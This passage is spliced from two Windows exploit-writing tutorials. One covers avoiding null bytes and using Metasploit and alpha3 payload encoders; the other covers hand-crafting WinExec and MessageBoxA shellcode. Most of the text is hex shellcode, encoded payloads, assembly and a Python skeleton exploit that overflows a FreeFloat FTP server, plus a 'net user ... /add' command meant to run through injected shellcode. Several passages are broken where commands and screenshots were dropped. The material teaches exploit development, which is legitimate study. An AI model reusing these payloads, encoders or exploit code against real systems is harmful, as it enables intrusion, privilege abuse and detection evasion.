"\x72\x65\x89\xe3\x68\x61\x6e\x20"
"\x00\x68\x6f\x72\x65\x6c\x68\x62"
"\x79\x20\x43\x68\x6e\x65\x64\x20"
"\x68\x6e\x20\x70\x77\x68\x20\x62"
"\x65\x65\x68\x68\x61\x76\x65\x68"
"\x59\x6f\x75\x20\x89\xe1\x31\xc0"
"\x50\x53\x51\x50\x50\xbe\xea\x07"
"\x45\x7e\xff\xe6\x31\xc0\x50\xb8"
"\x12\xcb\x81\x7c\xff\xe0";
From this point forward in this tutorial, we’ll continue to write our shellcode directly in
assembly code. If you were having a hard time understanding the asm code above, then stop
reading now and go back. The assembly used above is really basic and it should not take you a
long time to really understand what it does.
When we look back at the bytecode that was generated so far, we noticed that they all contain
null bytes. Null bytes may be a problem when you are overflowing a buffer, that uses null byte
as string terminator. So one of the main requirements for shellcode would be to avoid these
null bytes.
There are a number of ways to deal with null bytes : you can try to find alternative instructions
to avoid null bytes in the code, reproduce the original values, use an encoder, etc
At a certain point in our example, we had to set eax to zero. We could have used mov eax,0 to
do this, but that would have resulted in “\xc7\xc0\x00\x00\x00\x00”. Instead of doing that,
we used “xor eax,eax”. This gave us the same result and the opcode does not contain null
bytes. So one of the techniques to avoid null bytes is to look for alternative instructions that
will produce the same result.
In our example, we had 2 null bytes, caused by the fact that we needed to terminate the
strings that were pushed on the stack. Instead of putting the null byte in the push instruction,
perhaps we can generate the null byte on the stack without having to use a null byte.
This is a basic example of what an encoder does. It will, at runtime, reproduce the original
desired values/opcodes, while avoiding certain characters such as null bytes.
There are 2 ways to fixing this null byte issue : we can either write some basic instructions that
will take care of the 2 null bytes (basically use different instructions that will end up doing the
same), or we can just encode the entire shellcode.
We’ll talk about payload encoders (encoding the entire shellcode) in one of the next chapters,
let’s look at manual instruction encoding first.
"\x68\x6c\x61\x6e\x00"
and
"\x68\x61\x6e\x20\x00"
How can we do the same (get these strings on the stack) without using null bytes in the
bytecode ?
What if we subtract 11111111 from 006E616C (= EF5D505B) , write the result to EBX, add
11111111 to EBX and then write it to the stack ? No null bytes, and we still get what we want.
So basically, we do this
Do the same for the other null byte (using ECX as register)
In assembly :
[BITS 32]
XOR EAX,EAX
MOV EBX,0xEF5D505B
PUSH 0x65726f43
MOV ECX,0xEF0F5D50
ADD ECX,0x11111111
PUSH ECX
PUSH 0x6c65726f
PUSH 0x43207962
PUSH 0x2064656e
PUSH 0x7770206e
PUSH 0x65656220
PUSH 0x65766168
PUSH 0x20756f59
PUSH EBX
PUSH ECX
PUSH EAX
PUSH EAX
MOV ESI,0x7E4507EA
PUSH EAX
MOV EAX,0x7c81CB12
Of course, this increases the size of our shellcode, but at least we did not have to use null
bytes.
After compiling the asm file and extracting the bytes from the bin file, this is what we get :
Reading msgbox2.bin
Read 92 bytes
"\x31\xc0\xbb\x5b\x50\x5d\xef\x81"
"\xc3\x11\x11\x11\x11\x53\x68\x43"
"\x6f\x72\x65\x89\xe3\xb9\x50\x5d"
"\x0f\xef\x81\xc1\x11\x11\x11\x11"
"\x51\x68\x6f\x72\x65\x6c\x68\x62"
"\x79\x20\x43\x68\x6e\x65\x64\x20"
"\x68\x6e\x20\x70\x77\x68\x20\x62"
"\x65\x65\x68\x68\x61\x76\x65\x68"
"\x59\x6f\x75\x20\x89\xe1\x50\x53"
"\x51\x50\x50\xbe\xea\x07\x45\x7e"
"\xff\xe6\x31\xc0\x50\xb8\x12\xcb"
"\x81\x7c\xff\xe0";
To prove that it works, we’ll load our custom shellcode in a regular exploit, (on XP SP3, in an
application that has user32.dll loaded already)… an application such as Easy RM to MP3
Converter for example. (remember tutorial 1 ?)
A similar technique (to the one explained here) is used in in certain encoders… If you extend
this technique, it can be used to reproduce an entire payload, and you could limit the
character set to for example alphanumerical characters only. A good example on what I mean
with this can be found in tutorial 8.
A second technique that can be used to overcome the null byte problem in our shellcode is this
:
• write value to the stack without null bytes (so replace the null byte with something
else)
• overwrite the byte on the stack with a null byte, using a part of a register that already
contains null, and referring to a negative offset from ebp. Using a negative offset will
result in \xff bytes (and not \x00 bytes), thys bypassing the null byte limitation
[BITS 32]
PUSH 0x43207962
PUSH 0x2064656e
PUSH 0x7770206e
PUSH 0x65656220
PUSH 0x65766168
PUSH 0x20756f59
MOV ECX,ESP ;save pointer to "You have been..." in ECX
PUSH EBX
PUSH ECX
PUSH EAX
PUSH EAX
MOV ESI,0x7E4507EA
PUSH EAX
MOV EAX,0x7c81CB12
This technique uses the same concept as solution 2, but instead of writing a null byte, we start
off by writing nulls bytes to the stack (xor eax,eax + push eax), and then reproduce the non-
null bytes by writing individual bytes to negative offset of ebp
• write the non-null bytes to an exact negative offset location relative to the stack’s base
pointer (ebp)
Example :
[BITS 32]
PUSH EAX
MOV BYTE [EBP-2],6Eh ;
It becomes clear that the last 2 techniques will have a negative impact on the shellcode size,
but they work just fine.
Solution 4 : xor
Another technique is to write specific values in 2 registers, that will – when an xor operation is
performed on the values in these 2 registers, produce the desired value.
So let’s say you want to put 0x006E616C onto the stack, then you can do this :
Type 777777FF
Press XOR
Type 006E616C
Result : 77191693
Now put each value (777777FF and 77191693) into 2 registers, xor them, and push the
resulting value onto the stack :
[BITS 32]
MOV EAX,0x777777FF
MOV EBX,0x77191693
MOV EAX,0x777777FF
PUSH 0x43207962
PUSH 0x2064656e
PUSH 0x7770206e
PUSH 0x65656220
PUSH 0x65766168
PUSH 0x20756f59
PUSH EBX
PUSH ECX
PUSH EAX
PUSH EAX
MOV ESI,0x7E4507EA
PUSH EAX
MOV EAX,0x7c81CB12
Remember this technique – you’ll see an improved implementation of this technique in the
payload encoders section.
We are running Intel x86 assembly, on a 32bit CPU. So the registers we are dealing with are
32bit aligned to (4 byte), and they can be referred to by using 4 byte, 2 byte or 1 byte
annotations : EAX (“Extended” …) is 4byte, AX is 2 byte, and AL(low) or AH (high) are 1 byte.
So we can take advantage of that to avoid null bytes.
PUSH 0x1
\x68\x01\x00\x00\x00
Example :
XOR EAX,EAX
MOV AL,1
PUSH EAX
or, in bytecode :
\x31\xc0\xb0\x01\x50
[BITS 32]
PUSH 0x1
INT 3
XOR EAX,EAX
MOV AL,1
PUSH EAX
INT 3
Both bytecodes are 5 bytes, so avoiding null bytes does not necessarily mean your code will
increase in size.
You can obviously use this in many ways – for example to overwrite a character with a null
byte, etc)
XOR EAX,EAX
INC EAX
PUSH EAX
\x31\xc0\x40\x50
(=> only 4 bytes… so you can even decrease the number of bytes by being a little bit creative)
\x6A\x01
If you have to write a string to the stack and end it with a null byte, you can also do this :
• write the string and use spaces (0x20) at the end to make everything 4 byte aligned
Example : if you need to write “Corelan” to the stack, you can do this :
PUSH 0x65726f43
but you can also do this : (use space instead of null byte, and then push null bytes using a
register)
XOR EAX,EAX
PUSH EAX
PUSH 0x65726f43
Conclusion :
These are just a few of many techniques to deal with null bytes. The ones listed here should at
least give you an idea about some possibilities if you have to deal with null bytes and you don’t
want to (or – for whatever reason – you cannot) use a payload encoder.
Of course, instead of just changing individual instructions, you could use an encoding
technique that would encode the entire shellcode. This technique is often used to avoid bad
characters… and in fact, a null byte can be considered to be a bad character too.
So this is the right time to write a few words about payload encoding.
(Payload) Encoders
Encoders are not only used to filter out null bytes. They can be used to filter out bad
characters in general (or overcome a character set limitation)
Bad characters are not shellcode specific – they are exploit specific. They are the result of
some kind of operation that was executed on your payload before your payload could get
executed. (For example replacing spaces with underscores, or converting input to uppercase,
or in the case of null bytes, would change the payload buffer because it gets
terminated/truncated)
The best way to detect if your shellcode will be subject to a bad character restriction is to put
your shellcode in memory, and compare it with the original shellcode, and list the differences.
You obviously could do this manually (compare bytes in memory with the original shellcode
bytes), but it will take a while.
First, write your shellcode to a file (pveWritebin.pl – see earlier in this document)… write it to
c:\tmp\shellcode.bin for example
Next, attach Immunity Debugger to the application you are trying to exploit and feed the
payload (containing the shellcode) to this application.
When the application crashes (or stops because of a breakpoint set by you), run the following
command to compare the shellcode in file with the shellcode in memory :
If you already know what your bad chars are (based on the type of application, input, buffer
conversion, etc), you can use a different technique to see if your shellcode will work.
Suppose you have figured out that the bad chars you need to take care of are 0x48, 0x65,
0x6C, 0x6F, 0x20, then you can use skylined’s beta3 utility again. You need to have a bin file
again (bytecode written to file) and then run the following command against the bin file :
If one of these “bad chars” are found, their position in the shellcode will be indicated.
Encoders : Metasploit
When the data character set used in a payload is restricted, an encoder may be required to
overcome those restrictions. The encoder will either wrap the original code, prepend it with a
decoder which will reproduce the original code at runtime, or will modify the original code so
it would comply with the given character set restrictions.
The most commonly used shellcode encoders are the ones found in Metasploit, and the ones
written by skylined (alpha2/alpha3).
Let’s have a look at what the Metasploit encoders do and how they work (so you would know
when to pick one encoder over another).
You can get a list of all encoders by running the ./msfencode -l command. Since I am
targetting the win32 platform, we are only going to look at the ones that we written for x86
./msfencode -l -a x86
=======================================
The default encoder in Metasploit is shikata_ga_nai, so we’ll have a closer look at that one.
x86/shikata_ga_nai
Let’s use our original message shellcode (the one with null bytes) and encode it with
shikata_ga_nai, filtering out null bytes :
Original shellcode
Reading msgbox.bin
Read 78 bytes
"\x68\x6c\x61\x6e\x00\x68\x43\x6f"
"\x72\x65\x89\xe3\x68\x61\x6e\x20"
"\x00\x68\x6f\x72\x65\x6c\x68\x62"
"\x79\x20\x43\x68\x6e\x65\x64\x20"
"\x68\x6e\x20\x70\x77\x68\x20\x62"
"\x65\x65\x68\x68\x61\x76\x65\x68"
"\x59\x6f\x75\x20\x89\xe1\x31\xc0"
"\x50\x53\x51\x50\x50\xbe\xea\x07"
"\x45\x7e\xff\xe6\x31\xc0\x50\xb8"
"\x12\xcb\x81\x7c\xff\xe0";
"\xdb\xc9\x29\xc9\xbf\x63\x07\x01\x58\xb1\x14\xd9\x74\x24\xf4"
"\x5b\x83\xc3\x04\x31\x7b\x15\x03\x7b\x15\x81\xf2\x69\x34\x24"
"\x93\x69\xac\xe5\x04\x18\x49\x60\x39\xb4\xf0\x1c\x9e\x45\x9b"
"\x8f\xac\x20\x37\x27\x33\xd2\xe7\xf4\xdb\x4a\x8d\x9e\x3b\xfb"
"\x23\x7e\x4c\x8c\xd3\x5e\xce\x17\x41\xf6\x66\xb9\xff\x63\x1f"
"\x60\x6f\x1e\xff\x1b\x8e\xd1\x3f\x4b\x02\x40\x90\x3c\x1a\x88"
"\x17\xf8\x1c\xb3\xfe\x33\x21\x1b\x47\x21\x6a\x1a\xcb\xb9\x8c";
(Don’t worry if the output looks different on your system – you’ll understand why it could be
different in just a few moments)
Loaded into the debugger (using the testshellcode.c application), the encoded shellcode looks
like this :
As you step through the instructions, the first time the XOR instruction (XOR DWORD PTR
DS:[EBX+15],EDI is executed, an instruction below (XOR EDX,93243469) is changed to a LOOPD
instruction :
From that point forward, the decoder will loop and reproduce the original code… that’s nice,
but how does this encoder/decoder really work ?
1. it will take the original shellcode and perform XOR/ADD/SUB operations on it. In this
example, the XOR operation starts with an initial value of 58010763 (which is put in EDI in the
decoder). The XORed bytes are written after the decoder loop.
2. it will produce a decoder that will recombine/reproduce the original code, and write it right
below the decoding loop. The decoder will be prepended to the xor’ed instructions. Together,
these 2 components make the encoded payload.
• FCMOVNE ST,ST(1) (FPU instruction, needed to make FSTENV work – see later)
• SUB ECX,ECX
• FSTENV PTR SS: [ESP-C] : this results in getting the address of the first FPU instruction
of the decoder (FCMOVNE in this example). The requisite to make this instruction work
is that at least one FPU instruction is executed before this one – doesn’t matter which
one. (so FLDPI should work too)
• POP EBX : the address of the first instruction of the decoder is put in EBX (popped from
the stack)
It looks like the goal of the previous instructions was : “get the address of the begin of the
decoder and put it in EBX” (GetPC – see later), and “set ECX to 14”.
• XOR DWORD PTR DS: [EBX+15], EDI : perform XOR operation using EBX+15 and EDI,
and write the result at EBX+15. The first time this instruction is executed, a LOOPD
instruction is recombined.
• ADD EDI, DWORD PTR DS:[EBX+15] : EDI is increased with the bytes that were
recombined at EBX+15, by the previous instruction.
Ok, it starts to make sense. The first instructions in the decoder were used to determine the
address of the first instruction of the decoder, and defines where the loop needs to jump back
to. That explains why the loop instruction itself was not part of the decoder instructions
(because the decoder needed to determine it’s own address before it could write the LOOPD
instruction), but had to be recombined by the first XOR operation.
From that point forward, a loop is initiated and results are written to EBX+15 (and EBX is
increased with 4 each iteration). So the first time the loop is executed, after EBX is increased
with 4, EBX+15 points just below the loopd instruction (so the decoder can use EBX (+15) as
register to keep track of the location where to write the decoded/original shellcode). As
shown above, the decoding loop consists of the following instructions :
ADD EBX,4
The ECX register is used to keep track of the position in the shellcode(counts down). When ECX
reaches 1, the original shellcode is reproduced below the loop, so the jump (LOOPD) will not
be taken anymore, and the original code will get executed (because it is located directly after
the loop)
We know where the XOR and Additive words come from… but what about Polymorphic ?
Well, every time you run the encoder, some things change
• the place of the instructions to get the address of the start of the decoder changes
• the registers used to keep track of the position (EBX in our example above, EDX in the
screenshot below) varies.
In essence, the order of the intructions before the loop change, and the variable values
(registers, value of ESI) changes too.
This makes sure that, every time you create an encoded version of the payload, most of the
bytes will be different (without changing the overall concept behind the decoder), which
makes this payload “polymorphic” / hard to get detected.
x86/alpha_mixed
Encoding our example msgbox shellcode with this encoder produces a 218 byte encoded
shellcode :
"\x89\xe3\xda\xc3\xd9\x73\xf4\x58\x50\x59\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
"\x43\x58\x42\x4c\x45\x31\x42\x4e\x45\x50\x42\x48\x50\x43\x42"
"\x4f\x51\x62\x51\x75\x4b\x39\x48\x63\x42\x48\x45\x31\x50\x6e"
"\x47\x50\x45\x50\x45\x38\x50\x6f\x43\x42\x43\x55\x50\x6c\x51"
"\x78\x43\x52\x51\x69\x51\x30\x43\x73\x42\x48\x50\x6e\x45\x35"
"\x50\x64\x51\x30\x45\x38\x42\x4e\x45\x70\x44\x30\x50\x77\x50"
"\x68\x51\x30\x51\x72\x43\x55\x50\x65\x42\x48\x45\x38\x45\x31"
"\x43\x46\x42\x45\x50\x68\x42\x79\x50\x6f\x44\x35\x51\x30\x4d"
"\x59\x48\x61\x45\x61\x4b\x70\x42\x70\x46\x33\x46\x31\x42\x70"
"\x46\x30\x4d\x6e\x4a\x4a\x43\x37\x51\x55\x43\x4e\x4b\x4f\x4b"
"\x56\x46\x51\x4f\x30\x50\x50\x4d\x68\x46\x72\x4a\x6b\x4f\x71"
"\x43\x4c\x4b\x4f\x4d\x30\x41\x41";
As you can see in this output, the biggest part of the shellcode consists of alphanumeric
characters (we just have a couple of non-alphanumeric characters at the begin of the code)
The main concept behind this encoder is to reproduce the original code (via a loop), by
performing certain operations on these alphanumeric characters – pretty much like what
shikata_ga_nai does, but using a different (limited) instruction set and different operations.
x86/fnstenv_mov
Yet another encoder, but it will again produce something that has the same building blocks at
other examples of encoded shellcode :
• reproduce the original code (one way or another – this technique is specific to each
encoder/decoder)
"\x6a\x33\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x48"
"\x9d\xfb\x3b\x83\xeb\xfc\xe2\xf4\xb4\x75\x72\x3b\x48\x9d"
"\x9b\xb2\xad\xac\x29\x5f\xc3\xcf\xcb\xb0\x1a\x91\x70\x69"
"\x5c\x16\x89\x13\x47\x2a\xb1\x1d\x79\x62\xca\xfb\xe4\xa1"
"\x9a\x47\x4a\xb1\xdb\xfa\x87\x90\xfa\xfc\xaa\x6d\xa9\x6c"
"\xc3\xcf\xeb\xb0\x0a\xa1\xfa\xeb\xc3\xdd\x83\xbe\x88\xe9"
"\xb1\x3a\x98\xcd\x70\x73\x50\x16\xa3\x1b\x49\x4e\x18\x07"
"\x01\x16\xcf\xb0\x49\x4b\xca\xc4\x79\x5d\x57\xfa\x87\x90"
"\xfa\xfc\x70\x7d\x8e\xcf\x4b\xe0\x03\x00\x35\xb9\x8e\xd9"
"\x10\x16\xa3\x1f\x49\x4e\x9d\xb0\x44\xd6\x70\x63\x54\x9c"
"\x28\xb0\x4c\x16\xfa\xeb\xc1\xd9\xdf\x1f\x13\xc6\x9a\x62"
"\x12\xcc\x04\xdb\x10\xc2\xa1\xb0\x5a\x76\x7d\x66\x22\x9c"
"\x76\xbe\xf1\x9d\xfb\x3b\x18\xf5\xca\xb0\x27\x1a\x04\xee"
"\xf3\x6d\x4e\x99\x1e\xf5\x5d\xae\xf5\x00\x04\xee\x74\x9b"
"\x87\x31\xc8\x66\x1b\x4e\x4d\x26\xbc\x28\x3a\xf2\x91\x3b"
"\x1b\x62\x2e\x58\x29\xf1\x98\x15\x2d\xe5\x9e\x3b\x42\x9d"
"\xfb\x3b";
• FLDZ + FSTENV : code used to determine it’s own location in memory (pretty much the
same as what was used in shikata_ga_nai)
• XOR DWORD PTR DS:[EBX+13], 3BFB9D48 : XOR operation on the data at address that
is relative (+13) to EBX. EBX was initialized in the previous instruction. This will produce
4 byte of original shellcode. When this XOR operation is run for the first time, the
MOV AH,75 instruction (at 0x00402196) is changed to “CLD”
• SUB EBX, -4 (subtract 4 from EBX so next time we will write the next 4 bytes)
• LOOPD SHORT : jump back to XOR operation and decrement ECX, as long as ECX is not
zero
The loop will effectively reproduce the shellcode. When ECX is zero (so when all code has
been reproduced), we can see code (which uses MOV operations + XOR to get our desired
values):
First, a call to 0x00402225 is made (main function of the shellcode), where we can see a
pointer to “calc.exe” getting pushed onto the stack, and WinExec being located and executed.
Don’t worry about how the shellcode works (“locating winexec, etc”) for now – you’ll learn all
about it in the next chapters.
Take the time to look at what the various encoders have produced and how the decoding
loops work. This knowledge may be essential if you need to tweak the code.
Skylined recently released the alpha3 encoding utility (improved version of alpha2, which I
have discussed in the unicode tutorial). Alpha3 will produce 100% alphanumeric code, and
offers some other functionality that may come handy when writing shellcode/building
exploits. Definitely worth while checking out !
Little example : let’s assume you have written your unencoded shellcode into calc.bin, then
you can use this command to convert it to latin-1 compatible shellcode :
Reading calclatin.bin
"\xe8\xff\xff\xff\xff\xc3\x59\x68"
"\x66\x66\x66\x66\x6b\x34\x64\x69"
"\x46\x6b\x44\x71\x6c\x30\x32\x44"
"\x71\x6d\x30\x44\x31\x43\x75\x45"
"\x45\x35\x6c\x33\x4e\x33\x67\x33"
"\x7a\x32\x5a\x32\x77\x34\x53\x30"
"\x6e\x32\x4c\x31\x33\x34\x5a\x31"
"\x33\x34\x6c\x34\x47\x30\x63\x30"
"\x54\x33\x75\x30\x31\x33\x57\x30"
"\x71\x37\x6f\x35\x4f\x32\x7a\x32"
"\x45\x30\x63\x30\x6a\x33\x77\x30"
"\x32\x32\x77\x30\x6e\x33\x78\x30"
"\x36\x33\x4f\x30\x73\x30\x65\x30"
"\x6e\x34\x78\x33\x61\x37\x6f\x33"
"\x38\x34\x4f\x35\x4d\x30\x61\x30"
"\x67\x33\x56\x33\x49\x33\x6b\x33"
"\x61\x37\x6c\x32\x41\x30\x72\x32"
"\x41\x38\x6b\x33\x48\x30\x66\x32"
"\x41\x32\x43\x32\x43\x34\x48\x33"
"\x73\x31\x36\x32\x73\x30\x58\x32"
"\x70\x30\x6e\x31\x6b\x30\x61\x30"
"\x55\x32\x6b\x30\x55\x32\x6d\x30"
"\x53\x32\x6f\x30\x58\x37\x4b\x34"
"\x7a\x34\x47\x31\x36\x33\x36\x35"
"\x4b\x30\x76\x37\x6c\x32\x6e\x30"
"\x64\x37\x4b\x38\x4f\x34\x71\x30"
"\x68\x37\x6f\x30\x6b\x32\x6c\x31"
"\x6b\x30\x37\x38\x6b\x34\x49\x31"
"\x70\x30\x33\x33\x58\x35\x4f\x31"
"\x33\x34\x48\x30\x61\x34\x4d\x33"
"\x72\x32\x41\x34\x73\x31\x37\x32"
"\x77\x30\x6c\x35\x4b\x32\x43\x32"
"\x6e\x33\x5a\x30\x66\x30\x46\x30"
"\x4a\x30\x42\x33\x4e\x33\x53\x30"
"\x79\x30\x6b\x34\x7a\x30\x6c\x32"
"\x72\x30\x72\x33\x4b\x35\x4b\x31"
"\x35\x30\x39\x35\x4b\x30\x5a\x34"
"\x7a\x30\x6a\x33\x4e\x30\x50\x38"
"\x4f\x30\x64\x33\x62\x34\x57\x35"
"\x6c\x33\x41\x33\x62\x32\x79\x32"
"\x5a\x34\x52\x33\x6d\x30\x62\x30"
"\x31\x35\x6f\x33\x4e\x34\x7a\x38"
"\x4b\x34\x45\x38\x4b\x31\x4c\x30"
"\x4d\x32\x72\x37\x4b\x30\x43\x38"
"\x6b\x33\x50\x30\x6a\x30\x52\x30"
"\x36\x34\x47\x30\x54\x33\x75\x37"
"\x6c\x32\x4f\x35\x4c\x32\x71\x32"
"\x44\x30\x4e\x33\x4f\x33\x6a\x30"
"\x34\x33\x73\x30\x36\x34\x47\x34"
"\x79\x32\x4f\x32\x76\x30\x70\x30"
"\x50\x33\x38\x30\x30";
I could probably dedicate an entire document on using and writing encoders (which is out of
scope for now). You can, however, use this excellent uninformed paper, written by skape, on
how to implement a custom x86 encoder.
https://www.corelan.be/index.php/2010/02/25/exploit-writing-tutorial-part-9-introduction-
to-win32-shellcoding/
Hello and welcome! Today we will be writing our own shellcode from scratch. This is a
particularly useful exercise for two reasons: (1) you have an exploit that doesn't need to be
portable but has severe space restrictions and (2) it's good way to get a grasp on ROP (Return
Oriented Programming) even though there are some significant differences ROP will also
involve crafting parameters to windows API functions on the stack.
To speed things up we will be using the skeleton of the "FreeFloat FTP" exploit that we created
in part 1 of this tutorial series. You will also need a program called "arwin" which is a utility to
find the absolute addresses of windows functions within a specified DLL. I have included all the
relevant information below (the C source and a compiled version).
Introduction
I just want to say a couple of things before we get started. Firstly the shellcode we will write
will be OS and build specific (in our case WinXP SP3). Secondly this technique is only possible
because the OS DLL's in WinXP are not subject to base address randomization (ASLR). Thirdly
Google + MSDN is your biggest friend. Finally don't be discouraged this is much easier than it
sounds.
We will be creating two separate "payloads", (1) launching calculator and (2) creating a
message-box popup. To do this we will be leveraging two windows API functions (1) WinExec
and (2) MessageBoxA.
But first lets have a look at what the shellcode looks like when it is generate by the metasploit
framework (take note of the size for later). Don't forget to encode the shellcode to filter out
badcharacters.
"\xd9\xec\xd9\x74\x24\xf4\xb8\x28\x1f\x44\xde\x5b\x31\xc9\xb1"
"\x33\x31\x43\x17\x83\xeb\xfc\x03\x6b\x0c\xa6\x2b\x97\xda\xaf"
"\xd4\x67\x1b\xd0\x5d\x82\x2a\xc2\x3a\xc7\x1f\xd2\x49\x85\x93"
"\x99\x1c\x3d\x27\xef\x88\x32\x80\x5a\xef\x7d\x11\x6b\x2f\xd1"
"\xd1\xed\xd3\x2b\x06\xce\xea\xe4\x5b\x0f\x2a\x18\x93\x5d\xe3"
"\x57\x06\x72\x80\x25\x9b\x73\x46\x22\xa3\x0b\xe3\xf4\x50\xa6"
"\xea\x24\xc8\xbd\xa5\xdc\x62\x99\x15\xdd\xa7\xf9\x6a\x94\xcc"
"\xca\x19\x27\x05\x03\xe1\x16\x69\xc8\xdc\x97\x64\x10\x18\x1f"
"\x97\x67\x52\x5c\x2a\x70\xa1\x1f\xf0\xf5\x34\x87\x73\xad\x9c"
"\x36\x57\x28\x56\x34\x1c\x3e\x30\x58\xa3\x93\x4a\x64\x28\x12"
"\x9d\xed\x6a\x31\x39\xb6\x29\x58\x18\x12\x9f\x65\x7a\xfa\x40"
"\xc0\xf0\xe8\x95\x72\x5b\x66\x6b\xf6\xe1\xcf\x6b\x08\xea\x7f"
"\x04\x39\x61\x10\x53\xc6\xa0\x55\xab\x8c\xe9\xff\x24\x49\x78"
"\x42\x29\x6a\x56\x80\x54\xe9\x53\x78\xa3\xf1\x11\x7d\xef\xb5"
"\xca\x0f\x60\x50\xed\xbc\x81\x71\x8e\x23\x12\x19\x7f\xc6\x92"
"\xb8\x7f";
(2) MessageBoxA: popup with the title set to "b33f" and the message set to "Pop the box!"
'\x00\x0A\x0D' -t c
"\xb8\xe0\x20\xa7\x98\xdb\xd1\xd9\x74\x24\xf4\x5a\x29\xc9\xb1"
"\x42\x31\x42\x12\x83\xc2\x04\x03\xa2\x2e\x45\x6d\xfb\xc4\x12"
"\x57\x8f\x3e\xd1\x59\xbd\x8d\x6e\xab\x88\x96\x1b\xba\x3a\xdc"
"\x6a\x31\xb1\x94\x8e\xc2\x83\x50\x24\xaa\x2b\xea\x0c\x6b\x64"
"\xf4\x05\x78\x23\x05\x37\x81\x32\x65\x3c\x12\x90\x42\xc9\xae"
"\xe4\x01\x99\x18\x6c\x17\xc8\xd2\xc6\x0f\x87\xbf\xf6\x2e\x7c"
"\xdc\xc2\x79\x09\x17\xa1\x7b\xe3\x69\x4a\x4a\x3b\x75\x18\x29"
"\x7b\xf2\x67\xf3\xb3\xf6\x66\x34\xa0\xfd\x53\xc6\x13\xd6\xd6"
"\xd7\xd7\x7c\x3c\x19\x03\xe6\xb7\x15\x98\x6c\x9d\x39\x1f\x98"
"\xaa\x46\x94\x5f\x44\xcf\xee\x7b\x88\xb1\x2d\x31\xb8\x18\x66"
"\xbf\x5d\xd3\x44\xa8\x13\xaa\x46\xc5\x79\xdb\xc8\xea\x82\xe4"
"\x7e\x51\x78\xa0\xff\x82\x62\xa5\x78\x2e\x46\x18\x6f\xc1\x79"
"\x63\x90\x57\xc0\x94\x07\x04\xa6\x84\x96\xbc\x05\xf7\x36\x59"
"\x01\x82\x35\xc4\xa3\xe4\xe6\x22\x49\x7c\xf0\x7d\xb2\x2b\xf9"
"\x08\x8e\x84\xba\xa3\xac\x68\x01\x34\xac\x56\x2b\xd3\xad\x69"
"\x34\xdc\x45\xce\xeb\x03\xb5\x86\x89\x70\x86\x30\x7f\xac\x60"
"\xe0\x5b\x56\xf9\xfa\xcc\x0e\xd9\xdc\x2c\xc7\x7b\x72\x55\x36"
"\x13\xf8\xcd\x5d\xc3\x68\x5e\xf1\x73\x49\x6f\xc4\xfb\xc5\xab"
"\xda\x72\x34\x82\x30\xd6\xe4\xb4\xe6\x29\xda\x06\xc7\x85\x24"
"\x3d\xcf";
You can test these payloads later to confirm that they work as intended. Time to see if we can
live up to the metasploit framework and write our own shellcode!!
Skeleton Exploit
To make this tutorial as realistic as possible we are going to be implementing our payloads in
the "FreeFloat FTP" exploit that we made for part 1 of this tutorial series. The first step is to
generate our skeleton exploit, essentially we will be stripping down our previous exploit like
this.
#!/usr/bin/python
#----------------------------------------------------------------------------------#
# Software: http://www.freefloat.com/software/freefloatftpserver.zip #
#----------------------------------------------------------------------------------#
import socket
import sys
shellcode = (
#----------------------------------------------------------------------------------#
# Badchars: \x00\x0A\x0D #
# 0x77c35459 : push esp # ret | msvcrt.dll #
#----------------------------------------------------------------------------------#
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('192.168.111.128',21))
s.recv(1024)
s.send('USER anonymous\r\n')
s.recv(1024)
s.send('PASS anonymous\r\n')
s.recv(1024)
s.recv(1024)
s.send('QUIT\r\n')
s.close
This should give us a base to work with. Any shellcode we place in the shellcode variable will
be executed. As you can see in the screenshot below we reach our nopsled after stepping
through the instructions at EIP.
Nopsled
ASM && Opcode
When you write your own shellcode you will obviously have to deal with assembly and opcode
(hex translation of you ASM). You will need some basic knowledge of assembly (push, pop,
mov, xor, etc..) nothing to dramatic. The main point here is that your shellcode will be written
in opcode so you might ask yourself how do I know what the opcode is for any given
instruction. I'll tell you the way I approach the problem.
If you put a breakpoint in the debugger, you can manually edit the instruction there and
immunity will provide you with the opcode. In a sense you are using immunity as a dictionary.
In the screenshots below you can see the opcode “translation” of several random instructions.
(1) WinExec
Before we can do anything we need to known what the WinExec function looks like and what
parameters we need to feed it. You can find that information on MSDN.
WinExec: MSDN
Take some time to read through the information, you will see that the WinExec function has a
very simple structure consisting of three parameters as shown below.
Structure: Parameters:
);
Lets take this one parameter at a time. The first thing we need to find is a pointer to WinExec,
arwin can help us here since kernel32.dll is non-ASLR in WinXP. Open arwin in a terminal on
the debugging machine and type the following.
Next we need to figure out how to write our ASCII string (in this case the command we want to
run) to the stack. When doing this for the first time it might seem a bit confusing but it's not
that difficult. The best way to understand is by looking at the following examples.
calc.exe abcdefghijkl
Split Text into groups of 4 characters: Split Text into groups of 4 characters:
"calc" "abcd"
".exe" "efgh"
"ijkl"
Reverse the order of the character groups: Reverse the order of the character groups:
".exe" "ijkl"
"calc" "efgh"
"abcd"
Look on google for a ASCII to hex converter Look on google for a ASCII to hex converter
and convert each character while maintaining and convert each character while
maintaining
"\x2E\x65\x78\x65" "\x69\x6A\x6B\x6C"
"\x63\x61\x6C\x63" "\x65\x66\x67\x68"
"\x61\x62\x63\x64"
To write these values to the stack simply add To write these values to the stack simply
add
This seems pretty straight forward however you might have noticed that our ASCII text needs
to be 4-character aligned so what happens when it is not? There are quite a few ways of
dealing with this, I suggest you read this excellent tutorial written by corelanc0d3r. As always
mastery requires effort. I will however show you one technique, look at the example below.
ASCII Text:
"net "
"user"
" b33"
"f 12"
"34 /"
"add"
As you can see the alignment doesn't add up we are left with 3 characters at the end. There is
a easy fix
for this, adding an extra space at the end won't affect the command at all. After reversing the
group
Finally we need to push "1" to the stack. Remember if you don’t know the opcode for an ASM
instruction you can type the command live in the debugger which will translate it for you.
uCmdShow needs to be set to 0x00000001 there are a couple of ways you can do this just use
your
(*) Just to give you an idea, something like this could also work:
We are going to put these three arguments on the stack in the same order as shown on MSDN.
There are two things we need to remember: (1) the stack grows downward so we need to push
the last argument first and (2) lpCmdLine contains our ASCII command but WinExec doesn’t
want the ASCII itself it want a pointer to the ASCII string.
"\x68\x2E\x65\x78\x65" => PUSH ".exe" \ Push The ASCII string to the stack
